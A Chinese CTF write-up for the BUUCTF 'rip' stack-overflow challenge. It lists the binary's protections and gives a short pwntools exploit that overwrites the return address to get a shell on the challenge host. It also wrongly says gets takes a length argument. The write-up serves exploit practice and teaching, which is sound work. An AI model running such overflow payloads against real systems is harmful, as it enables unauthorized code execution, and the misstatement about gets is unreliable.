pwn刷题num19----栈溢出

BUUCTF-PWN-rip

首先查保护–>看链接类型–>赋予程序可执行权限–>试运行

64位程序，小端序
开启部分RELRO-----got表可写
未开启canary保护-----可能存在栈溢出
未开启NX保护-----堆栈可执行
未开启PIE-----程序地址为真实地址
RWX----有可读可写可执行段
动态链接

ida一下，看一下主函数

这里的gets(&s, argv); gets第一个参数是要输出的字符串首地址，第二个参数是输出的字符串的长度
s占0xf个字节，这里argv的值是未知的，但这个程序能利用的也只能是这里的栈溢出，试一下
exp

from pwn import*                 # pwntools函数导入
sh = remote("node4.buuoj.cn",25534)# 连接靶机的服务,需要输入对应的ip地址和端口号
           
payload = b'a'*0xf + b'b' * 0x8 + p64(0x40118A)    # 输入payload来进行操作以拿到程序的shell
sh.sendline(payload)
                                    # sendline() - 发送带回车符的字符串
                                    # sendline() 和 send() 唯一的区别就是在发送的字符串后面加上了回车换行符.
sh.interactive()                  # 发送命令进行交互, sh.interactive()允许我们在终端里将命令传送到靶机服务器

运行一下

成功获得shell